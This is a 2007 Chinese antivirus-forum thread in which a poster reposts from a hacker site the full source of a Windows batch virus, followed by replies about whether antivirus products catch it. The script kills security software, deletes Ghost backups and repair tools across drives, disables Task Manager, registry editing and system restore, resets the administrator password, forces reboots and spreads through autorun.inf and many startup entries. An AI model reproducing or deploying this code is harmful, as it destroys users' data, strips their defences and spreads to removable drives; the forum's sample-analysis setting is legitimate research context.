查看: 5629|回复: 15
收起左侧

[病毒样本] [转帖][黑客基地]超级批处理病毒

[复制链接]
起点
发表于 2007-1-26 19:58:13 | 显示全部楼层 |阅读模式
  1. [转帖]超级批处理病毒

  2. 网上的批处理病毒代码很少    我发一段我写的批处理给大家研究.....我水平很烂  也就只能写出这点东西了  大家多多包涵......还请斑竹给加个精吧...
  3. 废话不多说了...大家看代码...仅供研究...不要做坏事...
  4. @echo off
  5. title You DEAD!!!!!!!
  6. set taskkill=s
  7. copy %0 %windir%\system32\cmd.bat
  8. attrib %windir%\system32\cmd.bat +r +s +h
  9. net stop sharedaccess >nul
  10. %s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
  11. %s% /im norton* /f >nul
  12. %s% /im av* /f >nul
  13. %s% /im fire* /f >nul
  14. %s% /im anti* /f >nul
  15. %s% /im spy* /f >nul
  16. %s% /im bullguard /f >nul
  17. %s% /im PersFw /f >nul
  18. %s% /im KAV* /f >nul
  19. %s% /im ZONEALARM /f >nul
  20. %s% /im SAFEWEB /f >nul
  21. %s% /im OUTPOST /f >nul
  22. %s% /im nv* /f >nul
  23. %s% /im nav* /f >nul
  24. %s% /im F-* /f >nul
  25. %s% /im ESAFE /f >nul
  26. %s% /im cle /f >nul
  27. %s% /im BLACKICE /f >nul
  28. %s% /im def* /f >nul
  29. %s% /im 360safe.exe /f >nul
  30. net stop Shadow" "System" "Service
  31. set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
  32. for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul
  33. for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nul
  34. rem 修改注册表.......
  35. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
  36. CheckedValue /t REG_DWORD /d 00000000 /f >nul
  37. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
  38. 00000001 /f >nul
  39. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
  40. REG_DWORD /d 00000001 /f >nul
  41. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
  42. 4294967295 /f >nul
  43. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
  44. REG_DWORD /d 00000002 /f >nul
  45. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
  46. 00000001 /f >nul
  47. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
  48. 00000001 /f >nul
  49. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
  50. 00000001 /f >nul
  51. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
  52. 00000001 /f >nul
  53. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
  54. /d 00000001 /f >nul
  55. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
  56. 00000001 /f >nul
  57. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
  58. /d 00000001 /f >nul
  59. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
  60. 00000001 /f >nul
  61. REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
  62. 00000001 /f >nul
  63. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
  64. 00000001 /f >nul
  65. cls
  66. net user administrator 123456 >nul
  67. for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
  68. echo @echo off >d:\setup.bat
  69. echo shutdown -r -t 10 -f -c 亲爱的朋友,我十分抱歉的通知你,你的电脑已经严重崩溃,请重新安装系统可以解决此问题
  70. !^.^ >>d:\setup.bat
  71. echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动\a.bat >>d:\setup.bat
  72. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
  73. /f >>d:\setup.bat
  74. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
  75. /f >>d:\setup.bat
  76. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
  77. /f >>d:\setup.bat
  78. HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
  79. echo [windows] >> %windir%\win.ini
  80. echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
  81. echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
  82. echo [boot] >> %windir%\system.ini
  83. echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
  84. echo [AutoRun] >d:\autorun.inf
  85. echo Open=setup.bat >>d:\autorun.inf
  86. echo Open=system.bat >>d:\autorun.inf
  87. attrib d:\autorun.inf +r +s +h >>d:\setup.bat
  88. attrib d:\setup.bat +r +s +h >>d:\setup.bat
  89. start d:\setup.bat /min >nul
  90. echo @echo off >>C:\AUTOEXEC.BAT
  91. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
  92. C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
  93. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
  94. C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
  95. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
  96. C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
  97. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
  98. /f >>C:\AUTOEXEC.BAT
  99. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
  100. /f >>C:\AUTOEXEC.BAT
  101. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
  102. /f >>C:\AUTOEXEC.BAT
  103. echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
  104. copy %0 %systemroot%\windows.bat >nul
  105. if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
  106. if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
  107. if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
  108. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
  109. C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
  110. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
  111. C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
  112. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
  113. /f >>%windir%/system32/explorer.bat
  114. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
  115. /f >>%windir%/system32/explorer.bat
  116. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
  117. windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
  118. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
  119. windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
  120. echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
  121. attrib %windir%/system32/explorer.bat +r +s +h%
  122. attrib %systemroot%/windows.bat +r +s +h
  123. for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
  124. for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
  125. for %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.bat
  126. set drive=e f g h i j k l m n o p q r s t u v w x y z
  127. for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
  128. for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
  129. copy %0 d:\Program" "Files\run.bat
  130. for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
  131. >>%%c:\system.bat
  132. for %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.bat
  133. for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nul
  134. for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nul
  135. if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
  136. attrib d:\Program" "Files\run.bat +r +s +h >nul
  137. del %0
  138. exit
  139. 具体的意思我也不说了  太长了 有点批处理基础的朋友应该都看得懂

  140. 虽然我检查过  但是写这么长难免有错误 哪里写错了 还请高手们多多指点..

  141. 转载请注明出处!黑客基地
复制代码
dwjfeiren
发表于 2007-1-26 20:06:28 | 显示全部楼层
谢谢 楼主 分享
waterou
发表于 2007-1-26 20:16:09 | 显示全部楼层
这个,到底是什么效果?我小白,看不懂。。
Paxson
发表于 2007-1-26 20:16:44 | 显示全部楼层
呵呵 咔吧应该有自我保护吧 这样能有用?
qianwenxiang
发表于 2007-1-26 20:23:01 | 显示全部楼层
批处理结束的进程都不是反病毒软件的进程嘛 结束天网干什么呢? 天网好像不监控文件   加了那么多启动项 还复制了那么多文件 挺变态的批处理
dwjfeiren
发表于 2007-1-26 20:39:02 | 显示全部楼层
楼主,我只是保存了你的全贴内容在文本文档就给大蜘蛛杀了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
cxcx3
发表于 2007-1-26 21:03:54 | 显示全部楼层
看来蜘蛛的probably还是挺强的啊
waterou
发表于 2007-1-26 21:25:42 | 显示全部楼层
卡巴,连目标查毒都没有反应。。
起点
 楼主| 发表于 2007-1-26 21:38:23 | 显示全部楼层
原帖由 dwjfeiren 于 2007-1-26 20:39 发表
楼主,我只是保存了你的全贴内容在文本文档就给大蜘蛛杀了

蜘蛛的监控还是比较变态的
可以看看我发的上一个bat病毒,驱逐舰打开网页就报了
moonsilver
发表于 2007-1-26 22:05:59 | 显示全部楼层
很早就见过了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-1 00:41 , Processed in 0.131082 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表